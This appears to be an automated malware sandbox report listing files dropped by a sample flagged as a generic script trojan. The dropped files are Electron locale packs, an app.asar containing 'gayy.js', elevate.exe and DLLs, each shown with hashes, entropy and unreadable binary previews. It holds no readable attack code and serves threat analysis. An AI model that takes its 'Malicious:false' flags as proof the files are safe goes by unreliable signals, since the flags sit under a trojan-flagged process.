                                                                    Preview:..........c.h.....i.-...j.7...k.F...l.Q...n.Y...o.^...p.k...r.q...s.....t.....v.....w.....y.....z.....|.....}.........................................................................B.....T.....b.....r.....z.....................................................F.....d.....|.......................................................................%.....4.....H.....W.......................................................................#.....=.....].....{.....................................................#...........>.....k.....u...............................................'.....6.....P.....U.....e.....x.............................................................................E.......................&.....I.....j.....................................................%.....=.....j...............................................&.....2... .<...".N...%.f...(.....*.....+.....,.........../.....0.....1.I...3.X...4.t...5.....6.....7.....8.....9.....;.#...<./...=.9...>.L...?.V...@.d...A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\sr.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):630964
                                                                    Entropy (8bit):4.810757945626649
                                                                    Encrypted:false
                                                                    SSDEEP:12288:H0JfhK5lIRIS151RHexYzs+DN5W9xTvvWF37sQ/k/k/i:y5V9dN5Oxjn
                                                                    MD5:C68C235D8E696C098CF66191E648196B
                                                                    SHA1:5C967FBBD90403A755D6C4B2411E359884DC8317
                                                                    SHA-256:AB96A18177AF90495E2E3C96292638A775AA75C1D210CA6A6C18FBC284CD815B
                                                                    SHA-512:34D14D8CB851DF1EA8CD3CC7E9690EAF965D8941CFCAC1C946606115AD889630156C5FF47011B27C1288F8DF70E8A7DC41909A9FA98D75B691742EC1D1A5E653
                                                                    Malicious:false
                                                                    Preview:..........?.h.d...i.u...j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.$.....,.....1.....9.....A.....I.....P.....W.....^....._.....`.....b.......................#.....=.....X.............................I.....K.....O.....w...................................(.....B.....w.........................................B.....k.............................+.....D....._.....i.....y...................................Q...............................................&.....H.....l.....x.............................B.....e............................./.....O.........................................(.....H.....O.....R.....S.....].....i.......................5...........Q.....a...........1.....^................................... .....*.....N.......................O............................. .....5.....h.....}... .....".....%.....(.%...*.W...+.Z...,.x........./.....0.....1.4...3.K...4.....5.....6.$...7.L...8.z...9.....;.....<.....=.....>.!...?.2...@.S...A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\sv.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):370331
                                                                    Entropy (8bit):5.550902354924257
                                                                    Encrypted:false
                                                                    SSDEEP:6144:A3J7MHJrRRcAjowQx+ByxN6dn4bLXvu9M7SOVDE/xUDv6o5WI5ggbN:G7EHl9BdU5X5x
                                                                    MD5:272F8A8B517C7283EAB83BA6993EEA63
                                                                    SHA1:AD4175331B948BD4F1F323A4938863472D9B700C
                                                                    SHA-256:D15B46BC9B5E31449B11251DF19CD2BA4920C759BD6D4FA8CA93FD3361FDD968
                                                                    SHA-512:3A0930B7F228A779F727EBFB6AE8820AB5CC2C9E04C986BCE7B0F49F9BF124F349248ECDF108EDF8870F96B06D58DEA93A3E0E2F2DA90537632F2109E1AA65F0
                                                                    Malicious:false
                                                                    Preview:..........q.h.....i.....j.....k.,...l.7...n.?...o.D...p.Q...r.W...s.h...t.q...v.....w.....y.....z.....|.....}.........................................................................(.....9.....K....._.....g.....p.....................................................%.....=.....C.....S.....d.....k.....x.................................................................W.....m.....y.................................................................?.....c.......................................................................,.....4.....?.....W.....g.................................................................".....4.....E.....b.....i.....l.....m.....u.....}.............................&.....`.....g.........................................".....*.....,.....2.....D.....e.....}.............................1.....7.....A.....Q.....`.....h... .m...".w...%.....(.....*.....+.....,.........../.....0.1...1.]...3.g...4.....5.....6.....7.....8.....9.....;.....<.%...=.3...>.J...?.S...@.c...A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\sw.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):388458
                                                                    Entropy (8bit):5.356168167447509
                                                                    Encrypted:false
                                                                    SSDEEP:6144:24pV6wBz58kN6vhq//3UZFBIzDWs8ADjLKrYNguA/h5aS0DwV+ChZYeeq0e1k4H5:24bVd5B/3U/BLs8kMKguA/h5N1hZY+0u
                                                                    MD5:67A443A5C2EAAD32625EDB5F8DEB7852
                                                                    SHA1:A6137841E8E7736C5EDE1D0DC0CE3A44DC41013F
                                                                    SHA-256:41DFB772AE4C6F9E879BF7B4FA776B2877A2F8740FA747031B3D6F57F34D81DD
                                                                    SHA-512:E0FDFF1C3C834D8AF8634F43C2F16BA5B883A8D88DFD322593A13830047568FAF9F41D0BF73CD59E2E33C38FA58998D4702D2B0C21666717A86945D18B3F29E5
                                                                    Malicious:false
                                                                    Preview:..........K.h.L...i.W...j.c...k.r...l.}...n.....o.....p.....r.....s.....t.....v.....w.....y.....z.....|.....}.........................#.....+.....2.....9.....@.....A.....B.....G.....k.....}...........................................................!.....%.....M.....c...........................................................$.....5.....?.....E.....\.....p.....}.................................................................6.....N.....p.................................................................?.....F.....X.........................................K.....U.....`.....l.....................................................%.....,...../.....0.....=.....D.....I.....P.....W.....c.............................6.....N.....c.................................................................L.....e................................................... .!...".1...%.U...(.o...*.....+.....,.........../.....0.....1. ...3.6...4.L...5.i...6.....7.....8.....9.....;.....<.....=.....>.....?.&...@.A...A.q.

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ta.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):987188
                                                                    Entropy (8bit):4.090571010189695
                                                                    Encrypted:false
                                                                    SSDEEP:3072:S3YCY5ynH4ASpuCkCxSiP84Gb/v5nB7zztROcA2P:SnVUdQO84Gb/v55zztROcA2P
                                                                    MD5:18EC8FF3C0701A6A8C48F341D368BAB5
                                                                    SHA1:8BFF8AEE26B990CF739A29F83EFDF883817E59D8
                                                                    SHA-256:052BCDB64A80E504BB6552B97881526795B64E0AB7EE5FC031F3EDF87160DEE9
                                                                    SHA-512:A0E997FC9D316277DE3F4773388835C287AB1A35770C01E376FB7428FF87683A425F6A6A605D38DD7904CA39C50998CD85F855CB33AE6ABAD47AC85A1584FE4E
                                                                    Malicious:false
                                                                    Preview:..........x.h.....i.....j.....k.....l.)...n.1...o.6...p.C...r.I...s.Z...t.c...v.x...w.....y.....z.....|.....}...........................................................................................).....G.....P.......................M...........................................................,.....{.................&.....p.............................5.....W...........L.....d.......................#.....&.....8.....p.......................y...........+.....M.....Y.....a.....h.......................0.....K.....s.......................?...........$.....{.......................6.....w.....z.................1.....d...............................................1.....D...........c...........................................................$.....K.....c.....o.................S...........0.................U.....j........................... . ...".Z...%.....(.)...*.....+.....,.........../.....0.....1.....3.....4.7...5.....6.Z...7.....8.....9.$...;.g...<.....=.....>.....?.....@.0...A.y...C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\te.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):916416
                                                                    Entropy (8bit):4.338166638560127
                                                                    Encrypted:false
                                                                    SSDEEP:12288:iy/yX8OsABW3p1F9SviTlwJAg5NFO1Tr/p54JAQvfEC28+58XoX0DTq9OyU+0Ak1:vu8OkDY5YMZb
                                                                    MD5:A17F16D7A038B0FA3A87D7B1B8095766
                                                                    SHA1:B2F845E52B32C513E6565248F91901AB6874E117
                                                                    SHA-256:D39716633228A5872630522306F89AF8585F8092779892087C3F1230D21A489E
                                                                    SHA-512:371FB44B20B8ABA00C4D6F17701FA4303181AD628F60C7B4218E33BE7026F118F619D66D679BFFCB0213C48700FAFD36B2E704499A362F715F63EA9A75D719E7
                                                                    Malicious:false
                                                                    Preview:..........8.h.r...i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v.....w.....y.....z.#...|.)...}.;.....C.....H.....P.....X.....`.....g.....n.....u.....v.....w.....|...........3.....g.............................@.....U...........4.....6.....B.....j.......................2.......................>.....`...........$.....U.....s...............................................,.....o.............................>.................<.................p.........................................8.......................M.....~.........................................P.....l.............................2.....T.........................................0.....W.....~.............................7.............................c.................7.....C.....s.......................T...........A.................p.......................C............... .....".....%.K...(.....*.....+.....,.......I.../.....0.....1.U...3.x...4.....5.....6.....7.....8."...9.V...;.....<.....=.....>.....?.....@.=...A...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\th.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):771431
                                                                    Entropy (8bit):4.388714549432334
                                                                    Encrypted:false
                                                                    SSDEEP:12288:5ZY31Mkgs3s5UvfZLRflsjj8FCG1LDoAGkEeuLAD57Kle9d8nyj9FR3o09XAyFHa:57yU5K54
                                                                    MD5:A32BA63FEEED9B91F6D6800B51E5AEAE
                                                                    SHA1:2FBF6783996E8315A4FB94B7D859564350EE5918
                                                                    SHA-256:E32E37CA0AB30F1816FE6DF37E3168E1022F1D3737C94F5472AB6600D97A45F6
                                                                    SHA-512:ADEBDE0F929820D8368096A9C30961BA7B33815B0F124CA56CA05767BA6D081ADF964088CB2B9FCAA07F756B946FFFA701F0B64B07D457C99FD2B498CBD1E8A5
                                                                    Malicious:false
                                                                    Preview:............h.....i.....j.....k.....l.....o.....p.'...r.-...s.>...t.G...v.\...w.i...y.o...z.~...|.....}...............................................................................2.....V.............................\.....z...................................E.....r.............................&.....M.............................;.....V.....h.................1.............................+.....L.....X.....[.....j.......................2.....e...............................................&.....E.....~.................&.....Y.....t.................O.............................0.....3.....W.....x.........................................".....C.....U.....h.......................3.....E.................D.............................".....=.....d.......................e.................H....................................... .7...".L...%.....(.....*.*...+.-...,.>.....n.../.....0.....1.>...3.l...4.....5.....6.{...7.....8.....9.....;.....<.3...=.X...>.....?.....@.....A.-...C.r...D.....E...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\tr.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):395016
                                                                    Entropy (8bit):5.625100269002306
                                                                    Encrypted:false
                                                                    SSDEEP:6144:xxl+G2KPlJi+kKD80GlTgAI7WTge95j/0+Vi1havX9vwiBrVmI:rlt2IlrRn57m5j/1
                                                                    MD5:5FF2E5C95067A339E3D6B8985156EC1F
                                                                    SHA1:7525B25C7B07F54B63B6459A0D8C8C720BD8A398
                                                                    SHA-256:14A131BA318274CF10DE533A19776DB288F08A294CF7E564B7769FD41C7F2582
                                                                    SHA-512:2414386DF8D7AB75DCBD6CA2B9AE62BA8E953DDB8CD8661A9F984EB5E573637740C7A79050B2B303AF3D5B1D4D1BB21DC658283638718FDD04FC6E5891949D1B
                                                                    Malicious:false
                                                                    Preview:..........".h.....i.....j.....k.....l.....n.....o.....p.....r.....s.....t.....v."...w./...y.5...z.D...|.J...}.\.....d.....i.....q.....y.......................................................................#.....1.....O.....\.....p.........................................................../.....9.....R.....|...........................................................J.....b.....f.....n.....{.................................................................H.....V.....[.....c.....j.....q.............................................../.....>.....u.................................................................-.....F.....V.....].....`.....a.....k.....t.....{.............................$.....c.....i.........................................(.....2.....;.....B.....[.....{.............................@.....V.....].....c.....r............... .....".....%.....(.....*.....+.....,.......E.../.^...0.g...1.....3.....4.....5.....6.....7.:...8._...9.t...;.....<.....=.....>.....?.....@.....A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\uk.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):673547
                                                                    Entropy (8bit):4.9167574403691825
                                                                    Encrypted:false
                                                                    SSDEEP:12288:Yoff7plonpyOKtPXiNcnZx75kB3IjE8EmLvLNiXEJq//GW:YoffaXMd59E7
                                                                    MD5:361A0E1F665B9082A457D36209B92A25
                                                                    SHA1:3C89E1B70B51820BB6BAA64365C64DA6A9898E2F
                                                                    SHA-256:BD02966F6C6258B66EAE7FF014710925E53FE26E8254D7DB4E9147266025CC3A
                                                                    SHA-512:D4D25FC58053F8CCE4C073846706DC1ECBC0DC19308BA35501E19676F3E7ED855D7B57AE22A5637F81CEFC1AA032BF8770D0737DF1924F3504813349387C08CF
                                                                    Malicious:false
                                                                    Preview:........g...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.(...t.1...v.F...w.S...y.Y...z.h...|.n...}.........................................................................'.....D.....].........................................J...............................................6.....J.....a...................................O.....[.....m.............................C.....M.....].....t...............................................L.....}.........................................=.....d...................................+.....b.....y.............................1.....Q.....}...................................3.....c.....j.....m.....n.....~.............................I...........U.....g...........1.....`.......................*.....>.....R.....`.......................C.....x................./.....A.....U..................... .....".....%.0...(.j...*.....+.....,.........../.J...0.\...1.....3.....4.....5.A...6.....7.....8.....9.....;.....<.%...=.9...>.....?.....@.....A.3...C.m...D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\ur.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):585532
                                                                    Entropy (8bit):5.197200392190567
                                                                    Encrypted:false
                                                                    SSDEEP:12288:UA3OsGF8Pz0WEJytlkA+7Z5QzUExbW7DQQYrhu6co/9NjjFpvJK:UAe3A85oWB
                                                                    MD5:1CA4FA13BD0089D65DA7CD2376FEB4C6
                                                                    SHA1:B1BA777E635D78D1E98E43E82D0F7A3DD7E97F9C
                                                                    SHA-256:3941364D0278E2C4D686FAA4A135D16A457B4BC98C5A08E62AA12F3ADC09AA7F
                                                                    SHA-512:D0D9EB1AA029BD4C34953EE5F4B60C09CF1D4F0B21C061DB4EDE1B5EC65D7A07FC2F780ADE5CE51F2F781D272AC32257B95EEDF471F7295BA70B5BA51DB6C51D
                                                                    Malicious:false
                                                                    Preview:..........S.h.<...i.D...j.P...k._...l.j...n.r...o.w...p.....r.....s.....t.....v.....w.....y.....z.....|.....}...........................................&.....-.........../.....4.........................................?.....K.....U.........................................3.....H.....g...................................B.....n........................................._.....................................................1.....\.....~.......................G.....k.....z...............................................<...................................\.....................................................:.....U.....s...........................................................$.................b.....w.......................9.....U.....q.....w...................................<.......................?....._.....k........................... .....".....%.0...(.R...*.....+.....,.........../.....0.....1.K...3.e...4.....5.....6.....7.L...8.....9.....;.....<.....=.....>.....?.....@.!...A.Q...C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\vi.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):466098
                                                                    Entropy (8bit):5.819101554769623
                                                                    Encrypted:false
                                                                    SSDEEP:12288:3CwEs5kAfnzs0ACmwSxXwzIJWl+58Qagi7+URTJziV53f:3qOFfnzs0AHwSGz5A5rri7+UtliV53f
                                                                    MD5:DB0EB3183007DE5AAE10F934FFFACC59
                                                                    SHA1:E9EA7AEFFE2B3F5CF75AB78630DA342C6F8B7FD9
                                                                    SHA-256:DDABB225B671B989789E9C2CCD1B5A8F22141A7D9364D4E6EE9B8648305E7897
                                                                    SHA-512:703EFD12FCACE8172C873006161712DE1919572C58D98B11DE7834C5628444229F5143D231C41DA5B9CF729E32DE58DEE3603CB3D18C6CDD94AA9AA36FBF5DE0
                                                                    Malicious:false
                                                                    Preview:........_...h.....i.....j.....k.....l.....n.....o.....p.....r.....s.!...t.*...v.?...w.L...y.R...z.a...|.g...}.y.........................................................................................%.....2.....;.....b.....n.....x.........................................%...../.....F.....f.....q...............................................!.....2.....D.....T.....{.................................................................+.....V.....t...........................................................:.....D.....c...................................F.....................................................#.....A.....Q.....i.................................................................E.....z.............................4.....?.....O.....Z.....e.....x.............................<.....T.....z............................................. ."...".;...%.a...(.....*.....+.....,.........../.....0.....1.G...3.T...4.p...5.....6.....7.....8.....9.....;.+...<.5...=.F...>.a...?.m...@.....A.....C...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\zh-CN.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):340874
                                                                    Entropy (8bit):6.70707570391969
                                                                    Encrypted:false
                                                                    SSDEEP:6144:fmLpS8IeOL27M807pnCKjEWkE0G5xNlEPeVplD:fmLQmK2I1nCKjEjG5xNlEPe
                                                                    MD5:82326E465E3015C64CA1DB77DC6A56BC
                                                                    SHA1:E8ABE12A8DD2CC741B9637FA8F0E646043BBFE3D
                                                                    SHA-256:6655FD9DCDFAF2ABF814FFB6C524D67495AED4D923A69924C65ABEAB30BC74FB
                                                                    SHA-512:4989789C0B2439666DDA4C4F959DFFC0DDCB77595B1F817C13A95ED97619C270151597160320B3F2327A7DAFFC8B521B68878F9E5E5FB3870EB0C43619060407
                                                                    Malicious:false
                                                                    Preview:........,...h.J...i.R...j.U...k.d...l.k...m.s...o.y...p.~...r.....s.....t.....v.....w.....|.....}.......................................................%.....'.....,.....Z.....c.....o.......................................................................C.....[.....a.....m.................................................................!.....9.....E.....i.....x.....~.................................................................2.....J.....b.....n.....t.....|...........................................................%.....=.....^......................................................................./.....C.....R.....Y.....\.....^.....s.....|.........................................>.....D.......................................................................(.....@.....j.....|...............................................%... .+...".7...%.R...(.g...*.|...+.....,.........../.....0.....1.....3. ...4.5...5.V...6.....7.....8.....9.....;.....<.....=.....>.,...?.<...@.T...A.....C.....D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\locales\zh-TW.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):338121
                                                                    Entropy (8bit):6.721086394879431
                                                                    Encrypted:false
                                                                    SSDEEP:6144:zQmZEIQee2hZuwv+2440f5lHz8wMCM/9ylTN:cvIpn+2440f5lHzgT/C
                                                                    MD5:2456BF42275F15E016689DA166DF9008
                                                                    SHA1:70F7DE47E585DFEA3F5597B5BBA1F436510DECD7
                                                                    SHA-256:ADF8DF051B55507E5A79FA47AE88C7F38707D02DFAC0CC4A3A7E8E17B58C6479
                                                                    SHA-512:7E622AFA15C70785AAF7C19604D281EFE0984F621D6599058C97C19D3C0379B2EE2E03B3A7EC597040A4EEE250A782D7EC55C335274DD7DB7C7CA97DDCFD378A
                                                                    Malicious:false
                                                                    Preview:............h.....i.+...j./...k.>...l.I...n.Q...o.V...p.^...r.d...s.u...t.~...v.....w.....y.....z.....|.....}.............................................................>.....G.....S.....b.....h.....................................................!.....0.....H.....N.....Z.....i.....r.....~.................................................................2.....D.....J.....S....._.....k.....q.....w.....}.......................................................................).....5.....B.....W.....c.....o.........................................&...../.....;.....G.....Y.....t.....w...............................................................................................[.........................................?.....K.....W.....].....i.....o.....u.........................................E.....T.....Z.....`.....l............... .....".....%.....(.....*.....+.....,.......C.../.[...0.d...1.....3.....4.....5.....6.....7.%...8.7...9.C...;.U...<.e...=.u...>.....?.....@.....A.....C.....D...

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources.pak

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):5430320
                                                                    Entropy (8bit):7.995406820581218
                                                                    Encrypted:true
                                                                    SSDEEP:98304:/Zgm9tHEEIcjWbEvKfwa2sEJFz993CNh1QeHQF5qrwrw5z0uxRRrY2kuDYj9ds:RgAtkEx4EKfatyNhHwFkkrw5IcRRtkFs
                                                                    MD5:7971A016AED2FB453C87EB1B8E3F5EB2
                                                                    SHA1:92B91E352BE8209FADCF081134334DEA147E23B8
                                                                    SHA-256:9CFD5D29CDE3DE2F042E5E1DA629743A7C95C1211E1B0B001E4EEBC0F0741E06
                                                                    SHA-512:42082AC0C033655F2EDAE876425A320D96CDAEE6423B85449032C63FC0F7D30914AA3531E65428451C07912265B85F5FEE2ED0BBDB362994D3A1FA7B14186013
                                                                    Malicious:false
                                                                    Preview:............f.R......&....h).....,...4_?...4.G...4.J...4.\...4.e...4.l...4Ho...4.u...4.w...4.y...4.}...4....4&....4H....4.....4....4.....4F....4.....4.....4[....4d....4e....4.....4.....4.....4l....4.....4.....4.....4.....4g....4.....5.....5?....5.....5.....5H....5.:...5.=..~5]D...5oE...5;F...57H...5.H...5mI...5}M...56O...5.T...5{y...5c....5.....5.....5.....5.....5.....5G....5W....<.....<Y(...<.*...<j,...<N-...<.1..,<.2..-</=...<.H../<.T..0<._...@.p...@.x...@g|...@}}...@.~...@.i...Agv...A]x...A.....A.....A'....A....A.....A.....AT....Al....A.....A.....Ao....A$....A.....A2....A=....Ae....A.....A.....AS!...A.%...AH,...Am:...AM<...A:>...A.@...AuB...A.C.. AZF...N....N.....N.....Nc....NL....N....NM....N.....O.....O}....O.....O.....O#....O.....O}....O.....Od....O4....O.....O.0...O.7...Og>...O.A..$O.W..%O.Y..&O]c..'O.d..(O.i..)O.k..*Opm..+O.x..,O(|..-Oq....O..../O....0O....1O...2Og...3O....4O....5Ot...6O....7O....8OV...9OB...:O....;Om...<O....=O....>O....?Om...@OI...AO....BO....CO....DO..

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources\app.asar

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16983722
                                                                    Entropy (8bit):6.717715530755017
                                                                    Encrypted:false
                                                                    SSDEEP:98304:Q5a7U+NhCTOi8sQrZwwpxTbG9tIagImnkiold7GfbJLljZF+3J0gWuXYRM84ai:L7U+0B91gImMMxlY3Cg51F
                                                                    MD5:C98F6CB6C8BB050874CE8BA823423A65
                                                                    SHA1:92240A9A04F6E4779BE421A18D60C7F8DBD9834C
                                                                    SHA-256:09F3B0E505D2D7413A61DBA701E95E38529AA7F14A189669D338F0E27D314446
                                                                    SHA-512:BA1ABBA6A740F8974BFE4FECAA485A386289398A0437D97043F0D0B3A26E9CE3F64981DE8F2971921623A298483813A25E90F82F7D82170FE507696BE76FBC81
                                                                    Malicious:false
                                                                    Preview:.....+...+...+..{"files":{"gayy.js":{"size":119134,"integrity":{"algorithm":"SHA256","hash":"a9b81eb985eb3c84843cb11b4050e820e0eb05bd405837eb0f8d7bb12751664d","blockSize":4194304,"blocks":["a9b81eb985eb3c84843cb11b4050e820e0eb05bd405837eb0f8d7bb12751664d"]},"offset":"0"},"index.html":{"size":1176,"integrity":{"algorithm":"SHA256","hash":"409adaf0304de02b5f9f727722d0a7c25223f38ea0fe9ad6f086cab6c994f6f2","blockSize":4194304,"blocks":["409adaf0304de02b5f9f727722d0a7c25223f38ea0fe9ad6f086cab6c994f6f2"]},"offset":"119134"},"indexss.html":{"size":2355,"integrity":{"algorithm":"SHA256","hash":"a3d1f648e3378167f55cbd541949c84a938e3a31be6bba6d4cab3f802cca8cba","blockSize":4194304,"blocks":["a3d1f648e3378167f55cbd541949c84a938e3a31be6bba6d4cab3f802cca8cba"]},"offset":"120310"},"koru.ico":{"size":270398,"integrity":{"algorithm":"SHA256","hash":"6805b525d56aeef37aa16a2e7708ddaf38a5167d3722d2281beea004e203c4fe","blockSize":4194304,"blocks":["6805b525d56aeef37aa16a2e7708ddaf38a5167d3722d2281beea004e

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\resources\elevate.exe

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):107520
                                                                    Entropy (8bit):6.442687067441468
                                                                    Encrypted:false
                                                                    SSDEEP:3072:1bLnrwQoRDtdMMgSXiFJWcIgUVCfRjV/GrWl:1PrwRhte1XsE1l
                                                                    MD5:792B92C8AD13C46F27C7CED0810694DF
                                                                    SHA1:D8D449B92DE20A57DF722DF46435BA4553ECC802
                                                                    SHA-256:9B1FBF0C11C520AE714AF8AA9AF12CFD48503EEDECD7398D8992EE94D1B4DC37
                                                                    SHA-512:6C247254DC18ED81213A978CCE2E321D6692848C64307097D2C43432A42F4F4F6D3CF22FB92610DFA8B7B16A5F1D94E9017CF64F88F2D08E79C0FE71A9121E40
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..O..............h.......j.q.....k.....e......e......e.......zR........._...h......h.f.............h......Rich....................PE..L......W............................l........0....@.......................................@....................................P.......x.......................T.......p...............................@............0..$............................text............................... ..`.rdata...k...0...l..................@..@.data...............................@....gfids..............................@..@.rsrc...x...........................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\snapshot_blob.bin

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162352
                                                                    Entropy (8bit):4.860588090157433
                                                                    Encrypted:false
                                                                    SSDEEP:1536:uebVb91USSzM+uCPNgswpzHD41OzB965pUB8/DR9BgyLMRPoq/rX4JHj/kMKE0YC:uTgsED41OV965LXMj4zF2Xl9B
                                                                    MD5:8FEF5A96DBCC46887C3FF392CBDB1B48
                                                                    SHA1:ED592D75222B7828B7B7AAB97B83516F60772351
                                                                    SHA-256:4DE0F720C416776423ADD7ADA621DA95D0D188D574F08E36E822AD10D85C3ECE
                                                                    SHA-512:E52C7820C69863ECC1E3B552B7F20DA2AD5492B52CAC97502152EBFF45E7A45B00E6925679FD7477CDC79C68B081D6572EEED7AED773416D42C9200ACCC7230E
                                                                    Malicious:false
                                                                    Preview:.........4D11.0.226.20-electron.0...........................................6.. ...`.......06..a........a........a........ar.......a........a..............a.D.q..........`$.........D.u..........`$.......D.y..........`$.......u.D.}..........`$.........D............`D.........D............`$.......=.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....D.....@..F^.!..%.`.....(Jb....H.....@..F^..`.....H...IDa........D`....D`....D`.......`.....D]...D....D`......VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa............L.........................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\v8_context_snapshot.bin

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):476792
                                                                    Entropy (8bit):5.595608653079527
                                                                    Encrypted:false
                                                                    SSDEEP:3072:qqgtKzy7vqUSMd+5ZTR4ymbsLIniZiYIU+gTh3WOdvmttow2LyZDvooPmdZwmNgi:lgEzy2NTROsLftIU+gTQ4E2ro+dOmp
                                                                    MD5:A373D83D4C43BA957693AD57172A251B
                                                                    SHA1:8E0FDB714DF2F4CB058BEB46C06AA78F77E5FF86
                                                                    SHA-256:43B58CA4057CF75063D3B4A8E67AA9780D9A81D3A21F13C64B498BE8B3BA6E0C
                                                                    SHA-512:07FBD84DC3E0EC1536CCB54D5799D5ED61B962251ECE0D48E18B20B0FC9DD92DE06E93957F3EFC7D9BED88DB7794FE4F2BEC1E9B081825E41C6AC3B4F41EAB18
                                                                    Malicious:false
                                                                    Preview:.........K..11.0.226.20-electron.0..............................................`....f..8...........h...a........a........aT.......ar.......a........a..............a.D.q..........`$.........D.u..........`$.......D.y..........`$.......u.D.}..........`$.........D............`D.........D............`$.......=.D............`$.......D............`$.......D............`$.........D............`$.......D............`$......ID............`$.......D............`$.......D............`$....(Jb....D.....@..F^.!..%.`.....(Jb....H.....@..F^..`.....H...IDa........D`....D`....D`.......`.....D]...D....D`......VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa...........VIa............L.................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\nsrF83A.tmp\7z-out\vk_swiftshader.dll

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.HEUR.Trojan.Script.Generic.5591.10617.exe
                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5209088
